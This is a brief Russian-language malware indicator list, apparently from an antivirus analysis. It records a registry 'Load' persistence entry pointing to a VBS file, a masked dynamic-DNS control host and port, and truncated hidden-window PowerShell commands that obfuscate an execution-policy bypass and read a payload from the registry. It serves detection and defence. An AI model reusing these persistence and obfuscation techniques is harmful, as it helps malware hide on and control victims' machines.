Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\] 'Load' = '%USERPROFILE%\AppData\Roaming\GFGHGGH.VBS'
- 'vi#####dows.hopto.org':31028
- DNS ASK vi#####dows.hopto.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy chr(66)&chr(121)&chr(112)&chr(97)&chr(115)&chr(115) -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'Key__Name').Key__Name...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy chr(66)&chr(121)&chr(112)&chr(97)&chr(115)&chr(115) -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'Key__Name').Key__Name...